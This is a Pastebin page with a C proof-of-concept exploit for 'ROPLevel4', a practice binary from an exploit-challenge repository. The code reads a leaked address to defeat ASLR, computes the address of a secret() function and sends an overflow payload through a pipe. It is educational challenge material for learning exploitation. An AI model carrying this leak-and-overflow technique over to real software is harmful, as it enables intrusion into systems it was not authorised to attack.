Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // Exploit for ROPLevel4
- // PoC by Billy Ellis (@bellis1000)
- // Full write up available (soon?) on http://billyellis.net
- // Download the ROPLevel4 binary from https://github.com/Billy-Ellis/Exploit-Challenges
- #import <stdio.h>
- #import <string.h>
- #import <unistd.h>
- #import <stdlib.h>
- #import <fcntl.h>
- #import <sys/types.h>
- //probably should clear this up and split it in to separate functions but oh well ;-)
- int main(){
- //fixed addresses can be found by statically analysing the binary
- int fixedAddr = 0xc03c;
- int secretAddr = 0xbd28;
- //we'll use this eventually to store the final payload
- char exploit[128];
- //junk chars or "padding"
- char string[64] = {0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41};
- //this will be used to store the leaked address
- char readData[16];
- int fd[2];
- pid_t pid1;
- pipe(fd);
- pid1 = fork();
- //pipe stuff, thanks @liveoverflow for help with this :)
- if (pid1 == 0) {
- close(fd[1]);
- dup2(fd[0],0);
- //execute roplevel4
- execv("./roplevel4", NULL);
- }
- printf("[*] Reading leaked address...\n");
- //wait 3 secs to ensure file containing info leak is created successfully
- sleep(3);
- //open and read contents of file into readData
- FILE *file = fopen("./leak.txt","r");
- fgets(readData,32,file);
- fclose(file);
- //then convert the string to an int so we can actually use it for calculations
- int addr;
- sscanf(readData,"%x",&addr);
- printf("%x\n",addr);
- //calculate the ASLR "slide" or offset by working out the difference between the static addr & the real addr
- int offset = addr - fixedAddr;
- printf("[*] ASLR offset is: %x\n",offset);
- //calculate the real addr of the secret() function by adding the offset
- secretAddr = secretAddr + offset;
- printf("[*] Calculated address of secret() - %x\n",secretAddr);
- printf("[*] Crafting exploit payload...\n");
- //probably could have done this in a better way, but it works ;P
- //basically adds the bytes of the calculated address to the junk chars and stores them in the exploit array
- unsigned int one = secretAddr & 0xff;
- unsigned int two = (secretAddr>>8) & 0xff;
- unsigned int three = (secretAddr>>16) & 0xff;
- unsigned int four = (secretAddr>>24) & 0xff;
- sprintf(exploit,"%s%c%c%c",string,one,two,three);
- printf("[*] Payload crafted!\n[*] Executing...\n");
- close(fd[0]);
- //send the payload & hope for the best ;P
- //not 100% reliability, something to do with how I added the bytes to the string
- //I'll probably improve as I learn more C
- write(fd[1],exploit,512);
- return 0;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement